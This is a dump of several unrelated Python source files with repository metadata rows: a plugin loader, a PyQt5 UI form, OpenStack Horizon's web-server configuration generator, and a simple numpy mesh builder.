except (ImportError, AttributeError):
version = "unknown"
if status and not callable(setup):
# Is a module => find setup function
try:
setup = setup.setup
except AttributeError:
# No setup function found => treat as failed
if new:
log.debug("No setup function found for plugin '%s'" % name)
status = False
if status:
# Execute setup method
if new:
log.info("Setting up plugin '%s'" % name)
try:
setup()
except Exception:
log.error("Plugin '%s' setup failed" % name)
if current.response.s3.debug:
raise
status = False
# Update the registry
registry[name] = (version, status)
return status
# -------------------------------------------------------------------------
@classmethod
def _registry(cls, plugins=None):
"""
Get (or replace) the current plugin registry
@param plugins: the new registry
"""
session_s3 = current.session.s3
if plugins:
registry = session_s3.plugins = plugins
else:
registry = session_s3.plugins
if registry is None:
# New session => run detect
# - initialize registry first to prevent infinite recursion
registry = session_s3.plugins = {}
cls.detect()
return registry
# -------------------------------------------------------------------------
@staticmethod
def _scan():
"""
Iterator scanning the plugin directory for available plugins
@return: the names of the plugins
"""
folder = current.request.folder
path = os.path.join(folder, "modules", PLUGINS)
names = os.listdir(path)
for name in names:
name_, extension = os.path.splitext(name)
if name_ in IGNORE:
continue
path_ = os.path.join(path, name)
if os.path.isdir(path_) or extension == ".py":
yield(name_)
# -------------------------------------------------------------------------
@staticmethod
def _reload(name):
"""
Reload a plugin
@param name: the plugin name
@note: this works only within the current thread, other
threads may still be bound to the old version of
the plugin
"""
if name in IGNORE:
return
success = True
appname = current.request.application
plugin_name = "applications.%s.modules.%s.%s" % (appname, PLUGINS, name)
plugin = sys.modules.get(plugin_name)
if plugin is not None:
try:
reload(plugin)
except ImportError:
current.log.error("Reloading plugin '%s' failed" % name)
success = False
return success
# =============================================================================
# Do a full scan when reloading the module (=when the thread starts)
PluginLoader.detect(reset_all=True)
# =============================================================================
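# Illustrative example (added, not part of this module): a minimal plugin that
# PluginLoader would pick up is a single file such as modules/plugins/hello.py
# -- the name "hello" and the log message are placeholders -- containing:
#   __version__ = "1.0"
#   def setup():
#       from gluon import current
#       current.log.info("hello plugin set up")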
| 31.02847
| 83
| 0.513476
| 7,926
| 0.909049
| 560
| 0.064228
| 5,817
| 0.667164
| 0
| 0
| 4,359
| 0.499943
|
a1fbde784a20640d80d64437aa8dd036428fff1c
| 15,105
|
py
|
Python
|
CCMtask/ccm.py
|
yyFFans/DemoPractises
|
e0e08413efc598489401c8370f4c7762b3493851
|
[
"MIT"
] | null | null | null |
CCMtask/ccm.py
|
yyFFans/DemoPractises
|
e0e08413efc598489401c8370f4c7762b3493851
|
[
"MIT"
] | null | null | null |
CCMtask/ccm.py
|
yyFFans/DemoPractises
|
e0e08413efc598489401c8370f4c7762b3493851
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ccm.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_CCMTask(object):
def setupUi(self, CCMTask):
CCMTask.setObjectName("CCMTask")
CCMTask.resize(712, 585)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(CCMTask.sizePolicy().hasHeightForWidth())
CCMTask.setSizePolicy(sizePolicy)
CCMTask.setAutoFillBackground(False)
self.centralwidget = QtWidgets.QWidget(CCMTask)
self.centralwidget.setObjectName("centralwidget")
self.issueBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueBox.setGeometry(QtCore.QRect(10, 110, 691, 55))
self.issueBox.setObjectName("issueBox")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.issueBox)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.ARDTSEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ARDTSEdit.sizePolicy().hasHeightForWidth())
self.ARDTSEdit.setSizePolicy(sizePolicy)
self.ARDTSEdit.setTabletTracking(True)
self.ARDTSEdit.setObjectName("ARDTSEdit")
self.horizontalLayout_3.addWidget(self.ARDTSEdit)
spacerItem = QtWidgets.QSpacerItem(70, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem)
self.issueInfoEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.issueInfoEdit.sizePolicy().hasHeightForWidth())
self.issueInfoEdit.setSizePolicy(sizePolicy)
self.issueInfoEdit.setTabletTracking(True)
self.issueInfoEdit.setObjectName("issueInfoEdit")
self.horizontalLayout_3.addWidget(self.issueInfoEdit)
self.label = QtWidgets.QLabel(self.issueBox)
self.label.setText("")
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
self.issueDetailBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueDetailBox.setGeometry(QtCore.QRect(10, 170, 691, 401))
self.issueDetailBox.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.issueDetailBox.setTabletTracking(True)
self.issueDetailBox.setObjectName("issueDetailBox")
self.deletedParamsBox = QtWidgets.QGroupBox(self.issueDetailBox)
self.deletedParamsBox.setGeometry(QtCore.QRect(500, 20, 161, 271))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsBox.sizePolicy().hasHeightForWidth())
self.deletedParamsBox.setSizePolicy(sizePolicy)
self.deletedParamsBox.setObjectName("deletedParamsBox")
self.deletedParamsEdit = QtWidgets.QTextEdit(self.deletedParamsBox)
self.deletedParamsEdit.setGeometry(QtCore.QRect(10, 20, 141, 231))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsEdit.sizePolicy().hasHeightForWidth())
self.deletedParamsEdit.setSizePolicy(sizePolicy)
self.deletedParamsEdit.setObjectName("deletedParamsEdit")
self.opkeysBox_2 = QtWidgets.QGroupBox(self.issueDetailBox)
self.opkeysBox_2.setGeometry(QtCore.QRect(10, 210, 153, 182))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox_2.sizePolicy().hasHeightForWidth())
self.opkeysBox_2.setSizePolicy(sizePolicy)
self.opkeysBox_2.setObjectName("opkeysBox_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.opkeysBox_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.opkey1Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey1Edit_2.setTabletTracking(True)
self.opkey1Edit_2.setText("")
self.opkey1Edit_2.setPlaceholderText("")
self.opkey1Edit_2.setObjectName("opkey1Edit_2")
self.verticalLayout_2.addWidget(self.opkey1Edit_2)
self.opkey2Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey2Edit_2.setTabletTracking(True)
self.opkey2Edit_2.setText("")
self.opkey2Edit_2.setPlaceholderText("")
self.opkey2Edit_2.setObjectName("opkey2Edit_2")
self.verticalLayout_2.addWidget(self.opkey2Edit_2)
self.opkey3Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey3Edit_2.setTabletTracking(True)
self.opkey3Edit_2.setText("")
self.opkey3Edit_2.setPlaceholderText("")
self.opkey3Edit_2.setObjectName("opkey3Edit_2")
self.verticalLayout_2.addWidget(self.opkey3Edit_2)
self.opkey4Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey4Edit_2.setTabletTracking(True)
self.opkey4Edit_2.setText("")
self.opkey4Edit_2.setPlaceholderText("")
self.opkey4Edit_2.setObjectName("opkey4Edit_2")
self.verticalLayout_2.addWidget(self.opkey4Edit_2)
self.opkey5Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey5Edit_2.setTabletTracking(True)
self.opkey5Edit_2.setText("")
self.opkey5Edit_2.setPlaceholderText("")
self.opkey5Edit_2.setObjectName("opkey5Edit_2")
self.verticalLayout_2.addWidget(self.opkey5Edit_2)
self.opkey6Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey6Edit_2.setTabletTracking(True)
self.opkey6Edit_2.setText("")
self.opkey6Edit_2.setPlaceholderText("")
self.opkey6Edit_2.setClearButtonEnabled(False)
self.opkey6Edit_2.setObjectName("opkey6Edit_2")
self.verticalLayout_2.addWidget(self.opkey6Edit_2)
self.splitter_2 = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter_2.setGeometry(QtCore.QRect(10, 20, 153, 182))
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName("splitter_2")
self.opkeysBox = QtWidgets.QGroupBox(self.splitter_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox.sizePolicy().hasHeightForWidth())
self.opkeysBox.setSizePolicy(sizePolicy)
self.opkeysBox.setObjectName("opkeysBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.opkeysBox)
self.verticalLayout.setObjectName("verticalLayout")
self.opkey1Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey1Edit.setTabletTracking(True)
self.opkey1Edit.setText("")
self.opkey1Edit.setObjectName("opkey1Edit")
self.verticalLayout.addWidget(self.opkey1Edit)
self.opkey2Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey2Edit.setTabletTracking(True)
self.opkey2Edit.setText("")
self.opkey2Edit.setObjectName("opkey2Edit")
self.verticalLayout.addWidget(self.opkey2Edit)
self.opkey3Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey3Edit.setTabletTracking(True)
self.opkey3Edit.setText("")
self.opkey3Edit.setObjectName("opkey3Edit")
self.verticalLayout.addWidget(self.opkey3Edit)
self.opkey4Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey4Edit.setTabletTracking(True)
self.opkey4Edit.setText("")
self.opkey4Edit.setObjectName("opkey4Edit")
self.verticalLayout.addWidget(self.opkey4Edit)
self.opkey5Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey5Edit.setTabletTracking(True)
self.opkey5Edit.setText("")
self.opkey5Edit.setObjectName("opkey5Edit")
self.verticalLayout.addWidget(self.opkey5Edit)
self.opkey6Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey6Edit.setTabletTracking(True)
self.opkey6Edit.setText("")
self.opkey6Edit.setClearButtonEnabled(False)
self.opkey6Edit.setObjectName("opkey6Edit")
self.verticalLayout.addWidget(self.opkey6Edit)
self.splitter = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter.setGeometry(QtCore.QRect(190, 20, 291, 361))
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.newParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsBox.sizePolicy().hasHeightForWidth())
self.newParamsBox.setSizePolicy(sizePolicy)
self.newParamsBox.setObjectName("newParamsBox")
self.newParamsEdit = QtWidgets.QTextEdit(self.newParamsBox)
self.newParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 141))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsEdit.sizePolicy().hasHeightForWidth())
self.newParamsEdit.setSizePolicy(sizePolicy)
self.newParamsEdit.setPlaceholderText("")
self.newParamsEdit.setObjectName("newParamsEdit")
self.modifiedParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.modifiedParamsBox.sizePolicy().hasHeightForWidth())
self.modifiedParamsBox.setSizePolicy(sizePolicy)
self.modifiedParamsBox.setObjectName("modifiedParamsBox")
self.modifiedParamsEdit = QtWidgets.QTextEdit(self.modifiedParamsBox)
self.modifiedParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 121))
self.modifiedParamsEdit.setObjectName("modifiedParamsEdit")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(22, 20, 661, 81))
self.widget.setObjectName("widget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.branchSelectBox = QtWidgets.QGroupBox(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.branchSelectBox.sizePolicy().hasHeightForWidth())
self.branchSelectBox.setSizePolicy(sizePolicy)
self.branchSelectBox.setObjectName("branchSelectBox")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.branchSelectBox)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.checkBox10x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox10x.setChecked(True)
self.checkBox10x.setObjectName("checkBox10x")
self.horizontalLayout_4.addWidget(self.checkBox10x)
self.checkBox9x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox9x.setChecked(True)
self.checkBox9x.setObjectName("checkBox9x")
self.horizontalLayout_4.addWidget(self.checkBox9x)
self.horizontalLayout.addWidget(self.branchSelectBox)
spacerItem1 = QtWidgets.QSpacerItem(250, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.startButton = QtWidgets.QPushButton(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startButton.sizePolicy().hasHeightForWidth())
self.startButton.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Consolas")
font.setPointSize(14)
self.startButton.setFont(font)
self.startButton.setWhatsThis("")
self.startButton.setObjectName("startButton")
self.horizontalLayout.addWidget(self.startButton)
CCMTask.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(CCMTask)
self.statusbar.setObjectName("statusbar")
CCMTask.setStatusBar(self.statusbar)
self.retranslateUi(CCMTask)
QtCore.QMetaObject.connectSlotsByName(CCMTask)
def retranslateUi(self, CCMTask):
_translate = QtCore.QCoreApplication.translate
CCMTask.setWindowTitle(_translate("CCMTask", "CCMTask"))
self.issueBox.setTitle(_translate("CCMTask", "需求信息"))
self.ARDTSEdit.setPlaceholderText(_translate("CCMTask", "AR或者DTS编号"))
self.issueInfoEdit.setPlaceholderText(_translate("CCMTask", "需求描述信息"))
self.issueDetailBox.setTitle(_translate("CCMTask", "需求内容"))
self.deletedParamsBox.setTitle(_translate("CCMTask", "删除参数"))
self.opkeysBox_2.setTitle(_translate("CCMTask", "审核人列表"))
self.opkeysBox.setTitle(_translate("CCMTask", "运营商列表"))
self.opkey1Edit.setPlaceholderText(_translate("CCMTask", "OPkey1"))
self.opkey2Edit.setPlaceholderText(_translate("CCMTask", "OPkey2"))
self.opkey3Edit.setPlaceholderText(_translate("CCMTask", "OPkey3"))
self.opkey4Edit.setPlaceholderText(_translate("CCMTask", "OPkey4"))
self.opkey5Edit.setPlaceholderText(_translate("CCMTask", "OPkey5"))
self.opkey6Edit.setPlaceholderText(_translate("CCMTask", "OPkey6"))
self.newParamsBox.setTitle(_translate("CCMTask", "新增参数"))
self.modifiedParamsBox.setTitle(_translate("CCMTask", "修改参数"))
self.branchSelectBox.setTitle(_translate("CCMTask", "分支选择"))
self.checkBox10x.setText(_translate("CCMTask", "10.x ALL"))
self.checkBox9x.setText(_translate("CCMTask", "9.x ALL"))
self.startButton.setText(_translate("CCMTask", "Start"))
| 57
| 112
| 0.732539
| 14,954
| 0.984269
| 0
| 0
| 0
| 0
| 0
| 0
| 1,212
| 0.079774
|
a1fe7d59bcfb1477b00dec04a015c0d87e23fbf2
| 11,758
|
py
|
Python
|
openstack_dashboard/management/commands/make_web_conf.py
|
wilk/horizon
|
bdf7e692227367a928325acdd31088971d3c4ff4
|
[
"Apache-2.0"
] | 1
|
2019-08-07T08:46:03.000Z
|
2019-08-07T08:46:03.000Z
|
openstack_dashboard/management/commands/make_web_conf.py
|
wilk/horizon
|
bdf7e692227367a928325acdd31088971d3c4ff4
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
openstack_dashboard/management/commands/make_web_conf.py
|
wilk/horizon
|
bdf7e692227367a928325acdd31088971d3c4ff4
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import multiprocessing
import os
import re
import socket
import subprocess
import sys
import warnings
import six
from django.conf import settings
from django.core.management import base
from django import template
# Suppress DeprecationWarnings which clutter the output to the point of
# rendering it unreadable.
warnings.simplefilter('ignore')
cmd_name = __name__.split('.')[-1]
CURDIR = os.path.realpath(os.path.dirname(__file__))
PROJECT_PATH = os.path.realpath(os.path.join(CURDIR, '../..'))
STATIC_PATH = os.path.realpath(os.path.join(PROJECT_PATH, '../static'))
# Known apache regular expression to retrieve its version
APACHE_VERSION_REG = r'Apache/(?P<version>[\d.]*)'
# Known apache commands to retrieve its version
APACHE2_VERSION_CMDS = (
(('/usr/sbin/apache2ctl', '-V'), APACHE_VERSION_REG),
(('/usr/sbin/apache2', '-v'), APACHE_VERSION_REG),
)
# Known apache log directory locations
APACHE_LOG_DIRS = (
'/var/log/httpd', # RHEL / Red Hat / CentOS / Fedora Linux
'/var/log/apache2', # Debian / Ubuntu Linux
)
# Default log directory
DEFAULT_LOG_DIR = '/var/log'
def _getattr(obj, name, default):
"""Like getattr but return `default` if None or False.
By default, getattr(obj, name, default) returns default only if
    attr does not exist; here we return `default` even if attr evaluates to
None or False.
"""
value = getattr(obj, name, default)
if value:
return value
else:
return default
context = template.Context({
'DJANGO_SETTINGS_MODULE': os.environ['DJANGO_SETTINGS_MODULE'],
'HOSTNAME': socket.getfqdn(),
'PROJECT_PATH': os.path.realpath(
_getattr(settings, 'ROOT_PATH', PROJECT_PATH)),
'STATIC_PATH': os.path.realpath(
_getattr(settings, 'STATIC_ROOT', STATIC_PATH)),
'SSLCERT': '/etc/pki/tls/certs/ca.crt',
'SSLKEY': '/etc/pki/tls/private/ca.key',
'CACERT': None,
'PROCESSES': multiprocessing.cpu_count() + 1,
})
context['PROJECT_ROOT'] = os.path.dirname(context['PROJECT_PATH'])
context['PROJECT_DIR_NAME'] = os.path.basename(
context['PROJECT_PATH'].split(context['PROJECT_ROOT'])[1])
context['PROJECT_NAME'] = context['PROJECT_DIR_NAME']
context['DEFAULT_WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'wsgi.py')
context['WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'horizon_wsgi.py')
VHOSTNAME = context['HOSTNAME'].split('.')
VHOSTNAME[0] = context['PROJECT_NAME']
context['VHOSTNAME'] = '.'.join(VHOSTNAME)
if len(VHOSTNAME) > 1:
context['DOMAINNAME'] = '.'.join(VHOSTNAME[1:])
else:
context['DOMAINNAME'] = 'openstack.org'
context['ADMIN'] = 'webmaster@%s' % context['DOMAINNAME']
context['ACTIVATE_THIS'] = None
virtualenv = os.environ.get('VIRTUAL_ENV')
if virtualenv:
activate_this = os.path.join(
virtualenv, 'bin/activate_this.py')
if os.path.exists(activate_this):
context['ACTIVATE_THIS'] = activate_this
# Try to detect apache's version
# We fall back to 2.4.
context['APACHE2_VERSION'] = 2.4
APACHE2_VERSION = None
for cmd in APACHE2_VERSION_CMDS:
if os.path.exists(cmd[0][0]):
try:
reg = re.compile(cmd[1])
output = subprocess.check_output(cmd[0], stderr=subprocess.STDOUT)
if isinstance(output, six.binary_type):
output = output.decode()
res = reg.search(output)
if res:
APACHE2_VERSION = res.group('version')
break
except subprocess.CalledProcessError:
pass
if APACHE2_VERSION:
ver_nums = APACHE2_VERSION.split('.')
if len(ver_nums) >= 2:
try:
context['APACHE2_VERSION'] = float('.'.join(ver_nums[:2]))
except ValueError:
pass
def find_apache_log_dir():
for log_dir in APACHE_LOG_DIRS:
if os.path.exists(log_dir) and os.path.isdir(log_dir):
return log_dir
return DEFAULT_LOG_DIR
context['LOGDIR'] = find_apache_log_dir()
class Command(base.BaseCommand):
args = ''
help = """Create %(wsgi_file)s
or the contents of an apache %(p_name)s.conf file (on stdout).
The apache configuration is generated on stdout because the place of this
file is distribution dependent.
examples::
manage.py %(cmd_name)s --wsgi # creates %(wsgi_file)s
manage.py %(cmd_name)s --apache # creates an apache vhost conf file (on \
stdout).
manage.py %(cmd_name)s --apache --ssl --mail=%(admin)s \
--project=%(p_name)s --hostname=%(hostname)s
To create an apache configuration file, redirect the output towards the
location you desire, e.g.::
manage.py %(cmd_name)s --apache > \
/etc/httpd/conf.d/openstack_dashboard.conf
""" % {
'cmd_name': cmd_name,
'p_name': context['PROJECT_NAME'],
'wsgi_file': context['WSGI_FILE'],
'admin': context['ADMIN'],
'hostname': context['VHOSTNAME'], }
def add_arguments(self, parser):
# TODO(ygbo): Add an --nginx option.
parser.add_argument(
"-a", "--apache",
default=False, action="store_true", dest="apache",
help="generate an apache vhost configuration"
)
parser.add_argument(
"--cacert",
dest="cacert",
help=("Use with the --apache and --ssl option to define the path"
" to the SSLCACertificateFile"),
metavar="CACERT"
)
parser.add_argument(
"-f", "--force",
default=False, action="store_true", dest="force",
help="force overwriting of an existing %s file" %
context['WSGI_FILE']
)
parser.add_argument(
"-H", "--hostname",
dest="hostname",
help=("Use with the --apache option to define the server's"
" hostname (default : %s)") % context['VHOSTNAME'],
metavar="HOSTNAME"
)
parser.add_argument(
"--logdir",
dest="logdir",
help=("Use with the --apache option to define the path to "
"the apache log directory(default : %s)"
% context['LOGDIR']),
metavar="CACERT"
)
parser.add_argument(
"-m", "--mail",
dest="mail",
help=("Use with the --apache option to define the web site"
" administrator's email (default : %s)") %
context['ADMIN'],
metavar="MAIL"
)
parser.add_argument(
"-n", "--namedhost",
default=False, action="store_true", dest="namedhost",
help=("Use with the --apache option. The apache vhost "
"configuration will work only when accessed with "
"the proper hostname (see --hostname).")
)
parser.add_argument(
"--processes",
dest="processes",
help=("Use with the --apache option to define the number of "
"apache processes (by default the number of cpus +1 which "
"is %s on this machine).") % context['PROCESSES'],
metavar="PROCESSES"
)
parser.add_argument(
"-p", "--project",
dest="project",
help=("Use with the --apache option to define the project "
"name (default : %s)") % context['PROJECT_NAME'],
metavar="PROJECT"
)
parser.add_argument(
"-s", "--ssl",
default=False, action="store_true", dest="ssl",
help=("Use with the --apache option. The apache vhost "
"configuration will use an SSL configuration")
)
parser.add_argument(
"--sslcert",
dest="sslcert",
help=("Use with the --apache and --ssl option to define "
"the path to the SSLCertificateFile (default : %s)"
) % context['SSLCERT'],
metavar="SSLCERT"
)
parser.add_argument(
"--sslkey",
dest="sslkey",
help=("Use with the --apache and --ssl option to define "
"the path to the SSLCertificateKeyFile "
"(default : %s)") % context['SSLKEY'],
metavar="SSLKEY"
)
parser.add_argument(
"--apache-version",
dest="apache_version",
type=float,
help=("Use with the --apache option to define the apache "
"major (as a floating point number) version "
"(default : %s)."
% context['APACHE2_VERSION']),
metavar="APACHE_VERSION"
)
parser.add_argument(
"-w", "--wsgi",
default=False, action="store_true", dest="wsgi",
help="generate the horizon.wsgi file"
)
def handle(self, *args, **options):
force = options.get('force')
context['SSL'] = options.get('ssl')
if options.get('mail'):
context['ADMIN'] = options['mail']
if options.get('cacert'):
context['CACERT'] = options['cacert']
if options.get('logdir'):
context['LOGDIR'] = options['logdir'].rstrip('/')
if options.get('processes'):
context['PROCESSES'] = options['processes']
if options.get('project'):
context['PROJECT_NAME'] = options['project']
if options.get('hostname'):
context['VHOSTNAME'] = options['hostname']
if options.get('sslcert'):
context['SSLCERT'] = options['sslcert']
if options.get('sslkey'):
context['SSLKEY'] = options['sslkey']
if options.get('apache_version'):
context['APACHE2_VERSION'] = options['apache_version']
if options.get('namedhost'):
context['NAMEDHOST'] = context['VHOSTNAME']
else:
context['NAMEDHOST'] = '*'
# Generate the WSGI.
if options.get('wsgi'):
with open(
os.path.join(CURDIR, 'horizon.wsgi.template'), 'r'
) as fp:
wsgi_template = template.Template(fp.read())
if not os.path.exists(context['WSGI_FILE']) or force:
with open(context['WSGI_FILE'], 'w') as fp:
fp.write(wsgi_template.render(context))
print('Generated "%s"' % context['WSGI_FILE'])
else:
sys.exit('"%s" already exists, use --force to overwrite' %
context['WSGI_FILE'])
# Generate the apache configuration.
elif options.get('apache'):
# first check if custom wsgi file exists, if not, use default:
if not os.path.exists(context['WSGI_FILE']):
context['WSGI_FILE'] = context['DEFAULT_WSGI_FILE']
with open(
os.path.join(CURDIR, 'apache_vhost.conf.template'), 'r'
) as fp:
wsgi_template = template.Template(fp.read())
sys.stdout.write(wsgi_template.render(context))
else:
self.print_help('manage.py', cmd_name)
| 35.203593
| 78
| 0.58743
| 7,199
| 0.612264
| 0
| 0
| 0
| 0
| 0
| 0
| 5,162
| 0.43902
|
a1fe9f599cc2d428cbcc60b9598dd9359a4d7d5f
| 1,107
|
py
|
Python
|
codes/convergence_elasticity_advection/meshManager.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2021-06-18T14:52:03.000Z
|
2021-06-18T14:52:03.000Z
|
codes/convergence_elasticity/meshManager.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2019-01-07T13:11:11.000Z
|
2019-01-07T13:11:11.000Z
|
codes/convergence_elasticity_advection/meshManager.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
import math as m
def buildMesh(Mp,l,ppc):
# Mesh built by giving :
# 1-Number of elements in x-direction
# 2-Length of meshed domain
# 3-Number of particle per cell
    nex = Mp//ppc  # integer number of elements (linspace/arange below need an int count)
nnx=nex+1
lmp=l/(Mp-1)
dx = ppc*l/nex
xn = np.linspace(-lmp/2,l+lmp/2,nex+1)
connect = np.array([np.arange(0,nnx-1,1),np.arange(1,nnx,1)]).T
return xn,connect
def bar(x1,x2,Mp):
xp=np.zeros((Mp,2))
xp[:,0]=np.linspace(x1,x2,Mp)
return xp
def circle(c,r,nr,nt):
pi=m.pi
xp=np.zeros(((nr-1)*nt + 1,2))
xp[0,:]=np.array([0,0])
dr=r/(nr-1)
dt=2.*pi/nt
count=1
for t in range(nt):
for r in range(nr-1):
xp[count,:]=np.array([(r+1)*dr*m.cos(t*dt),(r+1)*dr*m.sin(t*dt)])
count+=1
xp[:]+=c
return xp
def rectangle(x0,Nx,Ny,lx,ly):
xp=np.zeros((Nx*Ny,2))
dx=lx/(Nx-1)
if Ny!=1:
dy=ly/(Ny-1)
else :
dy=0
for iy in range(Ny):
for ix in range(Nx):
xp[iy*Nx + ix,0]=x0[0]+ix*dx
xp[iy*Nx + ix,1]=x0[1]+iy*dy
return xp
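# Illustrative usage (added example, not part of the original code; the
# particle counts and lengths are arbitrary):
#   xn, connect = buildMesh(Mp=20, l=1.0, ppc=2)        # grid nodes + element connectivity
#   xp = bar(0.0, 1.0, 20)                              # material points along a 1D bar
#   xq = rectangle(np.array([0., 0.]), 5, 4, 1.0, 0.5)  # 5x4 points over a 1.0 x 0.5 patch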
| 22.14
| 76
| 0.532972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 137
| 0.123758
|
a1fedb42ea7da198208259c1cf29d8481af7dd8f
| 3,202
|
py
|
Python
|
exarl/agents/agent_vault/_prioritized_replay.py
|
schr476/EXARL
|
7f4596bd8b3d7960aaf52bc677ceac4f37029834
|
[
"BSD-3-Clause"
] | 2
|
